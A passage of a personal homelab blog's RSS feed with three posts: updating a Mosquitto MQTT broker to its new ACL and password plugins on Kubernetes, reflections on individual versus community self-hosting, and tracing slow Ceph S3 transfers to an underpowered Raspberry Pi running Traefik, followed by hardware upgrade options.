<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Homelab on ln --help</title>
    <link>https://blog.mei-home.net/categories/homelab/</link>
    <description>Recent content in Homelab on ln --help</description>
    <generator>Hugo -- 0.147.2</generator>
    <language>en</language>
    <lastBuildDate>Sun, 01 Mar 2026 21:27:37 +0100</lastBuildDate>
    <atom:link href="https://blog.mei-home.net/categories/homelab/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Mosquitto: Update to v2.1</title>
      <link>https://blog.mei-home.net/posts/mosquitto-2-1-update/</link>
      <pubDate>Sun, 01 Mar 2026 21:27:37 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/mosquitto-2-1-update/</guid>
      <description>It needs a few changes...</description>
      <content:encoded><![CDATA[<p>As part of this weekend&rsquo;s regular service update, I also came across
Mosquitto&rsquo;s new 2.1.2 release. This is my tale&hellip;</p>
<p>I&rsquo;m using <a href="https://mosquitto.org/">Mosquitto</a> as the MQTT broker for my IoT
thermostats and smart plugs. If you&rsquo;re interested, you can find more details on
my setup in <a href="https://blog.mei-home.net/posts/power-measurement/">this</a> and <a href="https://blog.mei-home.net/posts/k8s-migration-17-iot/">this</a>
post.</p>
<p>The <a href="https://mosquitto.org/ChangeLog.txt">changelog</a> of the new release contained
a few interesting points:</p>
<ul>
<li>The acl_file option is deprecated in favour of the acl-file plugin, which is
the same code but moved into a plugin. The acl_file option will be removed
in 3.0.</li>
<li>The password_file option is deprecated in favour of the password-file plugin,
which is the same code but moved into a plugin. The password_file option will
be removed in 3.0.</li>
</ul>
<p>I&rsquo;m using both of these options, so because I was doing the update on a lazy
Sunday morning instead of Friday evening after work, I decided to be a good
sysadmin and replace the <code>acl_file</code> and <code>password_file</code> options now, instead of
waiting for the update where they&rsquo;re ultimately getting removed.</p>
<p>The first hurdle was that there doesn&rsquo;t seem to be any good docs on how to use
either the <code>password-file</code> or the <code>acl-file</code> plugins. How do I configure them?
How do I use them? How do I even get them?</p>
<p><strong>Update 2026-03-02</strong>: It turns out that I just wasn&rsquo;t looking properly. The docs
for both, the <a href="https://mosquitto.org/documentation/plugins/acl-file/">ACL file plugin</a>
and the <a href="https://mosquitto.org/documentation/plugins/password-file/">Password file plugin</a>
are right there on the <a href="https://mosquitto.org/documentation/">main docs page</a>.
Thanks a lot to <a href="https://fosstodon.org/@ralight">@ralight@fosstodon.org</a> for pointing out
my mistake.</p>
<p>After not having any success in finding any examples, I finally hit upon an idea:
Look at the source code. Yet again, three Hurrah! for open source software. I
found <a href="https://github.com/eclipse-mosquitto/mosquitto/commit/c522361d359713c4648a92eadfe3312dfa0e4a3e">this commit</a>,
and in it this example Mosquitto config for internal testing:</p>
<pre tabindex="0"><code>listener 1883
allow_anonymous true
plugin ./mosquitto_acl_file.so
plugin_opt_acl_file ./acl_file
</code></pre><p>So first step: Figuring out whether those shared objects are actually delivered
as part of the image.
I had a look into the Mosquitto container and found that at lest those two
libs are delivered as part of the image:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>podman run -it eclipse-mosquitto:2.1.2-alpine ash
</span></span><span style="display:flex;"><span>find . -iname <span style="color:#e6db74">&#34;*.so&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>./usr/lib/mosquitto_password_file.so
</span></span><span style="display:flex;"><span>./usr/lib/mosquitto_acl_file.so
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>I ended up with this final config:</p>
<pre tabindex="0"><code>plugin /usr/lib/mosquitto_acl_file.so
plugin_opt_acl_file /mosquitto/config/acl.conf
plugin /usr/lib/mosquitto_password_file.so
plugin_opt_password_file /hl/passwd
</code></pre><p>But I kept getting an error:</p>
<pre tabindex="0"><code>1772364168: Error: Unable to open acl_file &#34;/mosquitto/config/acl.conf&#34;.
1772364168: Error: Plugin returned 13 when initialising.
</code></pre><p>The <code>acl.conf</code> file is mapped into the container via a k8s ConfigMap, so I thought
that perhaps there&rsquo;s something going wrong here?
I checked in a running Pod and saw this:</p>
<pre tabindex="0"><code>/ # ls -Al mosquitto/
total 16
drwxrwsrwx    3 root     1000          4096 Mar  1 11:26 config
drwxrwsr-x    3 mosquitto 1000          4096 Mar  1 11:25 data
drwxr-xr-x    2 mosquitto mosquitto      4096 Feb  9 20:01 log

/ # ls -Al mosquitto/config/
total 4
drwxr-sr-x    2 root     1000          4096 Mar  1 11:26 ..2026_03_01_11_26_50.4252382031
lrwxrwxrwx    1 root     1000            32 Mar  1 11:26 ..data -&gt; ..2026_03_01_11_26_50.4252382031
lrwxrwxrwx    1 root     1000            15 Mar  1 11:26 acl.conf -&gt; ..data/acl.conf
lrwxrwxrwx    1 root     1000            21 Mar  1 11:26 mosquitto.conf -&gt; ..data/mosquitto.conf
</code></pre><p>So I didn&rsquo;t see any issue, the files definitely existed.
After digging even more, I finally found <a href="https://github.com/eclipse-mosquitto/mosquitto/issues/3531">this GitHub issue</a>.
Somebody had the same issue as me. It looks like it was created by some sort of
security measure, disabling following of symlinks by default. After setting the
env variable to disable that behavior, <code>MOSQUITTO_UNSAFE_ALLOW_SYMLINKS=1</code>,
Mosquitto finally started up again and has been running nicely since then.</p>
<p>So be a bit cautious when running Mosquitto in a k8s cluster, the update to
v2.1.2 might not work without some small changes.</p>
]]></content:encoded>
    </item>
    <item>
      <title>A Few Thoughts On Self-Hosting and its Viability as a Solution</title>
      <link>https://blog.mei-home.net/posts/self-hosting-meta/</link>
      <pubDate>Mon, 02 Feb 2026 18:30:10 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/self-hosting-meta/</guid>
      <description>I ramble a bit about self-hosting and some blog posts from last year</description>
      <content:encoded><![CDATA[<p>Please allow me to ramble a bit about a Fediverse post I saw around this time
last year, and a few blog posts discussing self-hosting as a solution to the
dominance of big tech.</p>
<p>It all started with <a href="https://weirder.earth/@arisingvoice/114049359984514099">this post</a>
scrolling through my timeline last year.</p>
<blockquote>
<p>Are there <em>any</em> guides on self hosting for <em>complete</em> beginners out there? Especially those that have choice paralysis and care about privacy.</p>
<p>Ones that walk you through buying a domain name, setting the DNS or whatever it&rsquo;s called for it, setting up a hosting server (and which to choose), what OS to use on it etc? Or are you just expected to know all this?</p>
<p>We tried a while ago but nobody could figure out how to help us set it all up so we gave up.</p>
<p>Such a guide would be great though.</p></blockquote>
<p>So I thought to myself: Well, I&rsquo;m a Homelabber, and I like writing. And I didn&rsquo;t
actually know any kind of beginner&rsquo;s guide to self-hosting.</p>
<p>How difficult could it possibly be?</p>
<p>Well dear reader, I read the above post about a year ago. And as you might have
noticed, I&rsquo;ve not actually put out a nice Beginner&rsquo;s Guide to Self-Hosting on
this here blog in the meantime. And that&rsquo;s not for a lack of trying. At all.</p>
<p>I just found that I <em>can&rsquo;t</em>. For the life of me, I just couldn&rsquo;t write a guide.
This is the eighth! draft of this post. Every attempt I made fell into one of
three categories:</p>
<ol>
<li>WAY, WAY too detailed. As in &ldquo;I&rsquo;m 30 minutes of reading time in and haven&rsquo;t even finished the OS choice part yet&rdquo;.</li>
<li>Way too little detail, thinking way too often &ldquo;everyone knows this, surely&rdquo;</li>
<li>The worst kind, where I basically came over like the most arrogant &ldquo;Why not use GNU/Linux?&rdquo; FOSS-bro you&rsquo;ve ever had the misfortune of meeting</li>
</ol>
<p>Particularly the two drafts which ended up in category three were extremely
jarring to read. They genuinely left me sitting there thinking really hard about
whether I&rsquo;m coming across like that in my other blog posts or my Fediverse posts.</p>
<p>I&rsquo;m desperately hoping I don&rsquo;t.</p>
<p>All of these attempts were extremely frustrating. I&rsquo;ve been Homelabbing/self-hosting
for about 15 years now. Why can&rsquo;t I put together a nice, readable guide for
absolute beginners?</p>
<p>I think the problem is that I know all of this stuff. And have known at least the
basics for over a decade now. And I somehow fail to find a healthy balance between
attempting a complete brain dump and leaving &ldquo;important&rdquo; things out.</p>
<p>So I&rsquo;m admitting defeat. I&rsquo;m not the person to write a beginner&rsquo;s guide to self-hosting.</p>
<p>But I also haven&rsquo;t given up entirely yet. While I might have utterly failed to
write an absolute beginner&rsquo;s guide, I still believe that I could write a good
intermediate guide to self-hosting, where I don&rsquo;t explain absolutely everything,
but rather just write up some of tools I&rsquo;m using and some basic decisions which
need to be taken.</p>
<p>And if you&rsquo;re an absolute beginner in self-hosting, this doesn&rsquo;t mean you&rsquo;re out
of luck. Because <a href="https://mastodon.social/@_elena">Elena Rossini</a>, a European
filmmaker, photographer and writer, is currently writing a <a href="https://blog.elenarossini.com/a-newbies-guide-to-self-hosting-with-yunohost-part-1-reasons-requirements/">series about her recent foray into self-hosting</a>.</p>
<p>The three posts she&rsquo;s written in her series are already better than all of the
drafts I&rsquo;ve done over the past year.</p>
<h2 id="individual-self-hosting-is-no-solution-to-big-tech-dependency">Individual Self-Hosting is no solution to big tech dependency</h2>
<p>There were a couple of posts in the past year about how individual self-hosting
is not the solution to the issue of big tech dependency.</p>
<p>The main post was <a href="https://www.drewlyton.com/story/the-future-is-not-self-hosted/">this one</a>.
It starts out with the issue of Amazon preventing manual downloads of books,
and the author then setting up a new home server running Immich, Calibre Web,
Audiobookshelf and Jellyfin, concentrating on self-hosted local media.</p>
<p>But the conclusion is not that we should all run out and start self-hosting all
the things, individually:</p>
<blockquote>
<p>And this week, I want to share with you how I did it, what I learned, and why I think self-hosting is NOT the future we should be fighting for.</p></blockquote>
<p>And I broadly agree here. To me, self-hosting is a hobby. I like tinkering. I
intentionally spend time on my Homelab to relax, just for the fun of it. So I&rsquo;ve
got more than enough time to maintain all of the services I&rsquo;d like to run. But,
as the above post points out very correctly, all of this takes time. Even more
so once you&rsquo;d like to not only use your services internally, in your home, but
also have the ability to share stuff with other people. Because then you get into
issues of compatibility with what the majority of people are familiar with, and
also into the increased complexity of hosting public-facing services.</p>
<p>Specifically on this topic, there was also a <a href="https://mamot.fr/@thibaultamartin/114963756750234261">Fediverse post</a>
I disagree with quite severely:</p>
<blockquote>
<p>At the individual scale, self-hosting is not a good way to “be in control of my data.”</p>
<p>It’s like saying I do a vegetable garden to be in control of my food. I need much more than I can grow, it’s an inefficient use of my time, and I’m one bad season away from losing it all.</p>
<p>Resilience and transparency are key to be in control of my data and I can’t achieve this alone. This is a social problem, we need to bring solutions as a society.</p></blockquote>
<p>I do believe that self-hosting is a good way to be in control of <em>my</em> data. I&rsquo;ve
been doing it successfully for over a decade now. The only major thing I&rsquo;m not
currently self-hosting is my email, and that&rsquo;s coming soon. It is possible, given
enough time and the right skills.</p>
<p>I also dislike the comparison to being food-independent. I grew up on a farm.
There&rsquo;s exactly zero chance you get to be food-independent as side gig. But we
don&rsquo;t even have to get into the time investment or tooling. Just looking at the
amount of land that would be needed makes it clear that it&rsquo;s not possible for
anyone who doesn&rsquo;t make it their main job. We had around five family members
engaged in our part-time farming. We had a few fields, and for most of the time
a few pigs that we even slaughtered ourselves. But we weren&rsquo;t even remotely
food-independent. I think the only things we never bought were potatoes and peas,
and that&rsquo;s about it. Even though five people, three generations, were involved in
the farming, all as a side gig.</p>
<p>But: This leads me to the main part which rubs me wrong about the Fediverse post:
The absolutism. Both for food production and self-hosting. It&rsquo;s something which
rubs me the wrong way in some corners of the Internet at the moment, mainly in
discussions about boycotting US products or discussions about online privacy.
There&rsquo;s way too many people for whom it has to be either perfect, or it&rsquo;s not
even worth doing at all.</p>
<p>And that&rsquo;s just not true when it comes to replacing big tech services with
self-hosted alternatives. There&rsquo;s still a considerable win in replacing e.g.
Microsoft OneDrive with a Nextcloud instance, even if you&rsquo;re continuing to use
Google for email. It&rsquo;s still a win when the only thing you&rsquo;re self-hosting is
Immich to replace Google Photos. There&rsquo;s already advancement in using Signal
instead of Whatsapp. Switching to GrapheneOS isn&rsquo;t necessary for more independence
from big tech.</p>
<h2 id="who-does-the-self-hosting">Who does the self-hosting?</h2>
<p>The original blog post asks a central question: If it&rsquo;s not individuals, and
it&rsquo;s not big tech, who does the self-hosting? The author starts out with a nice
metaphor for &ldquo;Everybody self-hosts their own stuff&rdquo;: The suburban internet.
Everyone has a server in their garage, and they&rsquo;re all independent islands of
services. I find some fault with the &ldquo;islands&rdquo; definition here, because today
that&rsquo;s not necessarily true. For example, Nextcloud instances can federate. So
can Fediverse instances for social media, Matrix servers for messaging, even
identity providers like Keycloak have federation capabilities. So I don&rsquo;t think
individual self-hosting would necessarily have to lead to islands or silos.</p>
<p>But the rest of the argument holds: You&rsquo;d still have to have every individual, or
at least every family/friend group, learn the necessary skills for self-hosting.</p>
<p>The solution the post proposes is a more communal approach, where for example
libraries would provide some basic services for every member. And I like this
idea. What comes to mind is my time at university, back in the early 2000s.
After joining, everyone got a free email address, some web space for simple tilde
hosting. For CS students, there were additional services like an SVN server and
an issue management system.</p>
<p>The one counterargument I would voice: At least here in Germany, the state,
regardless of level, isn&rsquo;t exactly known for the success of its IT projects.
In fact, one more: At least here in Germany, we&rsquo;re seeing how the federalized
system leads to every state doing its own thing. It is not too far-fetched to
believe that some sort of &ldquo;citizen cloud&rdquo; program would similarly lead to silos
which can&rsquo;t talk to each other.</p>
<p>But as I&rsquo;ve noted above: While I do think self-hosting everything is perfectly
possible for certain people, it is not on a societal one. I can do it. Because
it&rsquo;s my main hobby, and the skills I&rsquo;m gathering there are also valuable for
my dayjob. Similarly, the stuff I do in my dayjob is also sometimes relevant to
my self-hosting. If it was just a means to an end to me, I would be self-hosting
a lot less, if anything at all. And not even remotely as well-configured as it
is.</p>
<p>In <a href="https://destructured.net/circle-hosted-future">A circle-hosted future</a>,
L. Rhodes describes a slight variation on the community-hosted idea. Here, the
author proposes smaller hosting groups than libraries or governments, for example
families or friend groups. This would avoid tying yourself to the state instead
of big tech. But it would of course have downsides, as any circle would then
have to know somebody with the necessary technical skills. Rhodes also points
out what&rsquo;s really the main obstacle in all of this, regardless of whether it&rsquo;s
libraries, universities, the state, big tech or your buddy doing the hosting: Trust.</p>
<p>Unless you have the skills to do it all yourself, you will have to trust somebody.
I would very likely be able to trust my buddy the most. For others, it might be
the government, even if just their municipal government.</p>
<h2 id="what-about-associationsclubs">What about associations/clubs?</h2>
<p>One point which both Rhodes and Lyton bring up only in side notes are associations
or clubs. Please note that the following is from a German perspective, I don&rsquo;t
know how clubs and associations work in the rest of the world.</p>
<p>In Germany, associations (Vereine, in German) are well-regulated, enjoy some
protections for their activities under the law and also enjoy some tax benefits.
They need to have a democratic structure to be recognized, and basic services
like banks have lots of experience with catering to their needs. They can own
things as a legal entity, in this case e.g. all the necessary equipment for
hosting services. There are also well-established mechanisms to pay members for
services rendered, e.g. if somebody hosts the club&rsquo;s infrastructure in their
basement.</p>
<p>They have the advantage of being NGOs, so you don&rsquo;t have to put your trust into
a state-provided &ldquo;citizen cloud&rdquo;. At the same time, you&rsquo;ve got direct and formal
influence over the club&rsquo;s dealings, which you wouldn&rsquo;t have if the services were
provided by libraries or universities.</p>
<p>I&rsquo;ve also got some personal experience with an association, specifically a German
shooting club (Schützenverein). For those not familiar with the concept, they are
something of a combination of a sports shooting club as their main activity
and a bit of a &ldquo;traditions club&rdquo; if that makes any sense? Their main activity
is as a sport club for air rifle shooting. Although these days, many clubs also
have crossbows, due to some really weird pieces of gun legislation when it comes
to young children. &#x1f937;
My main point being: As shooting clubs, almost all of them have a piece of
shared infrastructure, their shooting range, which is managed by the club, and
in large part maintained by the diverse skills of the club members. Hence, why
I think that they&rsquo;re a viable model for running some sort of shared service
infrastructure.</p>
<p>Finally, there&rsquo;s also their openness, when compared to small circles like friend
groups or extended families. You don&rsquo;t actually have to have a friend or family
member who has the necessary skills for self-hosting, you can just join the local
&ldquo;local services&rdquo; club and pay your dues.</p>
<p>One great example of a service-providing German association which is known beyond
Germany is <a href="https://codeberg.org/">Codeberg</a>. They&rsquo;re providing a hosted Git
forge experience somewhat similar to GitHub, but in the form of an association
instead of an LLM slop producing leech.</p>
<p>In fact, having written the above, allow me some whishful thinking: An association
which provides a co-hosting space. For people without a garage/basement, who
don&rsquo;t want to put their racks into their living room. With a couple 1 Gb/s fibers
coming in, perhaps a bit of cooling as well? And a few work benches and tools to
as a space to work on the machines.</p>
<h2 id="what-im-planning">What I&rsquo;m planning</h2>
<p>Since <em>waves around wildly</em> got as bad as it is, I&rsquo;ve been thinking more and more
about what I can do to improve my local community. And as the only useful skill
I have is Homelabbing, I&rsquo;ve been thinking for a while now how to make that skill
useful on a wider horizon than just myself. Especially considering that I&rsquo;ve
already got the substrate up and running. There&rsquo;s storage, there&rsquo;s a web
server, there&rsquo;s an entire k8s cluster, and there are backups.</p>
<p>So what would I need?</p>
<ul>
<li>Some interest. I&rsquo;ve got no idea whether anyone who trusts me would actually be interested</li>
<li>User management: If at all possible, I would like to go via Keycloak, which would likely need
a new instance, as Keycloak doesn&rsquo;t seem to be able to separate client access per user</li>
<li>Facilities? Right now, I&rsquo;m hosting my stuff off of a 250 Mb/s down, 40 Mb/s up connection,
with the hosts sitting in my living room</li>
<li>Offsite backups</li>
<li>Public docs</li>
<li>A general idea about which SLAs I could provide</li>
<li>A general idea about which services I would provide
<ul>
<li>I&rsquo;d probably avoid e.g. Mastodon, just because I don&rsquo;t think I&rsquo;d be any good at
all as a moderator</li>
</ul>
</li>
</ul>
<p>Thoughts to mull over for the next few months.</p>
]]></content:encoded>
    </item>
    <item>
      <title>S3 Performance and Homelab Hardware Musings</title>
      <link>https://blog.mei-home.net/posts/s3-perf-and-future-hw/</link>
      <pubDate>Thu, 08 Jan 2026 00:35:03 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/s3-perf-and-future-hw/</guid>
      <description>I finally figured out my S3 performance problems and think about a Homelab Hardware refresh</description>
      <content:encoded><![CDATA[<p>Wherein I figure out why my Ceph S3 is so slow and think about potential
hardware upgrades.</p>
<p>As part of my <a href="https://blog.mei-home.net/posts/go-access/">goaccess post</a>, I had to copy
around almost 60 GB of logs, from my laptop to my desktop. I decided to do that
via my Ceph S3. And it was very, very slow. There were 185 files to copy, with
a total size just shy of 60 GiB. The majority of that size comes from two Traefik
log files, both around 30 GiB in size. I used <a href="https://rclone.org/">Rclone</a> to
sync the files to an empty directory on my desktop with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rclone sync -P my-s3:public/traefik-log ./
</span></span></code></pre></div><p>And that was very slow. I saw a maximum of 25 MiB/s, that&rsquo;s it. And sure, the
S3 bucket I was copying from was only backed by HDDs, so there&rsquo;s an upper limit.
And my network is only 1 Gb/s, so there&rsquo;s another potential bottleneck. But,
at the same time, 25 MiB/s is still a bit anemic, considering that the HDDs should
be able to do 120 MB/s, and the network should be able to do about the same. This
S3 performance issue has been dogging me for quite a while. I found it in earlier
copy operations as well, including for example my backups, which also go into
S3 buckets via <a href="https://restic.net/">restic</a>.</p>
<p>Before describing the problem in detail, here is what the overall setup looks
like:</p>
<figure>
    <img loading="lazy" src="s3-overview.svg"
         alt="A diagram showing the setup. It shows five hosts. The first three have one HDD each. Two of them also have one RGW instance each. Then the fourth host has the Traefik instance, and the fifth host is my desktop machine. The two RGW instances each have connections to all three HDDs, and the Traefik instance has connections to both RGWs. The desktop only has one connection, to the Traefik instance."/> <figcaption>
            <p>Setup of RGW access in my Homelab.</p>
        </figcaption>
</figure>

<p>So my desktop contacts the Traefik proxy for access to S3. Traefik, in turn,
contacts the two load-balanced Ceph RGW instances. Those, in turn, are backed by
three HDDs for data storage. Each HDD is in a different host, and the two RGW
instances also run on different hosts. Both the HDDs and the RGW instances run
on one of my three Ceph hosts, while the Traefik instances runs on a non-Ceph
host.</p>
<p>With that out of the way, let&rsquo;s have a look at the problem. Here is the transmission
chart for my RGWs while copying the aforementioned 60 GB from an S3 bucket to
my desktop:</p>
<figure>
    <img loading="lazy" src="traefik-pi4-throughput.png"
         alt="A screenshot of a Grafana time series chart. It shows the bytes send by my Ceph S3 setup. The graph starts at around 0. At 19:55, it starts going up, until it reaches the maximum of about 27 MB/s around 20:03. The plot hovers around that value until about 20:41, when it slowly goes back to zero."/> <figcaption>
            <p>Throughput of my RGW cluster during the transfer.</p>
        </figcaption>
</figure>

<p>As I&rsquo;ve said above, 27 MB/s isn&rsquo;t exactly good throughput in my setup, it should
be topping out at four times that, under ideal circumstances, as my HDDs should
be able to make 120 MB/s at most.</p>
<p>Looking around, I first thought that the disks of my Ceph nodes were fully utilized
by a mere 25 MB/s read. But that wasn&rsquo;t the case. My next thought was the network
on the Ceph nodes, but that also topped out at about 200 Mbit/s. The last thing
I checked was the CPU utilization on the Ceph nodes running the RGW instances.
My thinking being: Perhaps the load of the OSD for disk access combined with the
RGW load was too much? But that also wasn&rsquo;t it. Max CPU load was around 25%.</p>
<p>Then I had an idea: All the traffic needed to go through the Traefik I&rsquo;m using
as my k8s Ingress. So what about the machine running that? And it turned out that
the CPU for that machine was nearly fully loaded during the entire copy process:</p>
<figure>
    <img loading="lazy" src="traefik-pi-cpu.png"
         alt="A screenshot of a Grafana time series chart. It shows the CPU utilization during the copy process, starting at around 12% utilization until 20:00 and then increasing rapidly to 84%. It then stays around that value until about 20:43, when it returns to the previous 12%. The graph also shows the different types of CPU utilization. Throughout the entire duration, about 30% of the CPUs is taken up by softirq, another 30% by sys and only 17% by user usage."/> <figcaption>
            <p>CPU utilization on the Pi 4 running Traefik during the copy operation.</p>
        </figcaption>
</figure>

<p>The poor Pi 4 is far beyond its capabilities here, it seems. To confirm that
this was really due to CPU power, I repeated the test. The overall setup is the
same, just that now, I scheduled the Traefik Ingress Pod on one of my Ceph hosts.
It&rsquo;s a 12th Gen Intel i3-12100T. In contrast to the Pi, it was able to do about
93 MB/s, and instead of over 40 minutes, it only needed 12 for the same copy
operation:</p>
<figure>
    <img loading="lazy" src="traefik-beefy-throughput.png"
         alt="And another screenshot of a Grafana time series plot. It again shows the throughput per second of my RGW cluster. It again starts near zero, and slowly goes up starting at 12:21, before it reaches its maximum of about 93 MB/s at 12:24. It keeps that throughput until 12:32, when it slowly start going down again, hitting near-zero again at 12:34."/> <figcaption>
            <p>Throughput of my RGW cluster during the copy operation, with Traefik running on a beefier machine.</p>
        </figcaption>
</figure>

<p>And these 93 MB/s are probably not the max that my RGW cluster can push, as I
think that the Traefik Ingress is again holding it back. Only this time not due
to CPU, but rather due to networking:</p>
<figure>
    <img loading="lazy" src="network-usage.png"
         alt="Another screenshot of a Grafana time series chart. This time, it shows the receiving and transmitting network traffic for the host running Traefik. It shows that at for the whole transmission, 924 Mbit/s are transmitted, and about 700 Mbit/s are received."/> <figcaption>
            <p>Network utilization of the host running Traefik. Left Y axis is receiving, right Y axis is sending.</p>
        </figcaption>
</figure>

<p>While there is still some breathing room on the 1 Gbit/s connection in the
RX direction, with only 700 Mbit/s used, the TX direction is pretty much full,
with 924 Mbit/s. I believe there is likely still a few MB/s to be had for the
S3 copy. Because the host here is also a Ceph host. So besides sending out
data from Traefik, it is also sending out data from its Ceph OSD to the other
RGW running on another host. That&rsquo;s likely the majority of the 700 Mbit/s of
incoming data.</p>
<p>Sadly, I don&rsquo;t have any powerful hosts which are not also Ceph hosts to test
the theory. Everything else in the Homelab is currently either a Pi 4 or an
old Pentium N3710.</p>
<h2 id="future-hardware-thoughts">Future hardware thoughts</h2>
<p>I&rsquo;ve thought about updating the 8 Raspberry Pi CM4 8GB which form the main
compute in my Homelab since <a href="https://blog.mei-home.net/posts/control-plane-pi5/">my issues with my control plane nodes</a>
last year. The Pi 4 is now over 6 years old, and it wasn&rsquo;t a performance beast
to begin with. But the thing is: Besides very specific instances like what I
described above or my control plane issues, the performance of the Pi 4 is still
perfectly fine for everything I&rsquo;m doing. Could my Grafana dashboards load a bit
faster during the first load of the day? Sure. Could the Nextcloud UI be a bit
more performant? Yes. But it really isn&rsquo;t <em>that</em> bad.</p>
<p>Still, I think it&rsquo;s time to at least consider an update. There are three basic
options I&rsquo;m currently seeing:</p>
<ol>
<li>Do a 1:1 replacement, replacing all of the Pi CM4 with Pi CM5</li>
<li>Expand the RAM in the Ceph nodes and get rid of the 8 CM4</li>
<li>Replace the Pi CM4 with three or four SFF machines</li>
</ol>
<h3 id="switching-to-the-pi-5">Switching to the Pi 5</h3>
<p>By now, the Raspberry Pi CM5 has been released, and the Turing Pi 2 board, which
I have my CM4 in at the moment, might support the CM5 out of the box. <em>Might</em>
being the important word here. They had a blog post back in December which showed
a Turing Pi 2 board with CM5, but that blog post has now vanished. I looked at
their Discord, and it seems the general support wasn&rsquo;t quite as good as that
blog post made it sound. Potentially, especially flashing the CM5 was not quite
working properly. Which wouldn&rsquo;t matter to me too much - my worker nodes do
netboot anyway. So let&rsquo;s put this option into a maybe.</p>
<p>Provided that the CM5 actually works in the Turing Pi 2 boards, this would be
the lowest effort approach. I would just take out all of the CM4 and replace them
with CM5. Looking at my trusted Pi dealer <a href="https://www.berrybase.de/">BerryBase</a>,
each CM5, in the no eMMC, no WiFi/Bluetooth variant with 8 GB of RAM would cost
me 86,90 €, for a total of 695,20 €. Add to that some passive heatsinks for around
50 bucks total, and the entire upgrade would cost me about 750 € shipped.</p>
<p><strong>Total Effort:</strong> Minimal
<strong>Total Costs:</strong> About 750 €</p>
<h3 id="moving-the-entire-homelab-onto-the-three-current-ceph-hosts">Moving the entire Homelab onto the three current Ceph hosts</h3>
<p>First, what would I need to replace the 8 CM4? I don&rsquo;t think CPU is that much
of a bottleneck. Most of the time, my Homelab&rsquo;s combined CPUs are about 87% idle.
More interesting is that I would need 8x8 GB = 64 GB of RAM. Sure, I would
probably need a bit less, because I wouldn&rsquo;t need all the foundational services
eight times, but let&rsquo;s still use the 64 GB as a ballpark.</p>
<p>I&rsquo;ve currently got three hosts running my Ceph cluster. First an Odroid H3.
I would like to get rid of this one to be honest, as it&rsquo;s not really fit for
purpose. It has two SATA and SATA power connectors, and that&rsquo;s it. So in this
scheme, it would definitely need to be replaced entirely. Before looking at
replacements, let&rsquo;s look at the other two hosts.</p>
<p>The next one is my old home server, with an AMD A10-9700e 3 GHz CPU and 16 GB
of RAM. The board allows up to only 32 GB. Not great, but also not terrible.
Looking around, a 32 GB kit would be somewhere around 270 €. For my future
readers, it&rsquo;s the beginning of 2026, and LLM data centers are currently eating
hardware like there&rsquo;s no tomorrow.
I&rsquo;d need a 32 GB kit instead of a 16 GB kit because the MB only has two RAM
slots.</p>
<p>The last host is the newest, it&rsquo;s running an Intel i3-12100T and already has
32 GB of RAM. Another 32 GB should be fine here, so that would be another
270 €.</p>
<p>Then there&rsquo;s the replacement for the Odroid H3. The following is just a quick
search, I could likely get it for cheaper.</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Part</th>
          <th style="text-align: right">Price</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">Intel Core Ultra 5 225T</td>
          <td style="text-align: right">250 €</td>
      </tr>
      <tr>
          <td style="text-align: right">ASUS PRIME B860-PLUS</td>
          <td style="text-align: right">158 €</td>
      </tr>
      <tr>
          <td style="text-align: right">GSkill Flare DDR5-6000 2x16 GB</td>
          <td style="text-align: right">328 €</td>
      </tr>
      <tr>
          <td style="text-align: right">Noctua NH-L9x65 CPU Cooler</td>
          <td style="text-align: right">60 €</td>
      </tr>
      <tr>
          <td style="text-align: right">beQuiet! Pure Power 13M 650W</td>
          <td style="text-align: right">101 €</td>
      </tr>
      <tr>
          <td style="text-align: right">Kingston 512 GB NVMe SSD</td>
          <td style="text-align: right">147 €</td>
      </tr>
      <tr>
          <td style="text-align: right">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</td>
          <td style="text-align: right">&mdash;&mdash;&ndash;</td>
      </tr>
      <tr>
          <td style="text-align: right">Total</td>
          <td style="text-align: right">1044 €</td>
      </tr>
  </tbody>
</table>
<p>As I said, mostly quick and dirty. I would have loved to calculate with 64 GB,
but those DDR5 RAM prices are certainly something else.</p>
<p>So with this, I would end up with the same amount of RAM as before.</p>
<p>The effort would be moderate. I would need to build the new machine, and then
migrate the Ceph OSDs over to it from the H3. I could then of course leave the
H3 running as well and use that as a worker?</p>
<p>But the cost would be quite significant, compared to the CM5 replacement.</p>
<p><strong>Total Effort:</strong> Moderate
<strong>Total Costs:</strong> 270 + 270 + 1044 = 1584 €</p>
<p>It would be interesting to see what this option would do with my Homelab&rsquo;s power
consumption. I&rsquo;m currently at around 150 W. Replacing the H3 with a beefier machine
would increase the consumption, but at the same time, removing the 8 CM4 is also
going to do something. And by how much would the power consumption of the two
current Ceph hosts increase when they also need to run workloads besides Ceph?</p>
<p>One issue I would see here: The ability to reboot machines. I only ended up with
so many CM4 because I wanted the ability to reboot any physical host without
having to take down the Homelab. With only three machines providing for both,
the Ceph cluster and the rest of my workloads, could I take one of them down?</p>
<h3 id="moving-to-sff-machines-for-my-workers">Moving to SFF machines for my workers</h3>
<p>The last, and to me most interesting option: Do a bigger change. Replace the CM4
with SFF PCs, probably at least three of them. Here, again, the main point is
that I want to retain the ability to restart any physical host without having to
take down the entire Homelab beforehand.</p>
<p>The main advantage of this setup would be that I would want to experiment a bit.
Instead of adding the bare hosts to my k8s cluster, I&rsquo;d want to install <a href="https://linuxcontainers.org/incus/">Incus</a>
and work with VMs. Mostly so that I&rsquo;ve got an easy way to experiment a bit,
without having to run the experimental VMs on my desktop. I very much enjoyed the
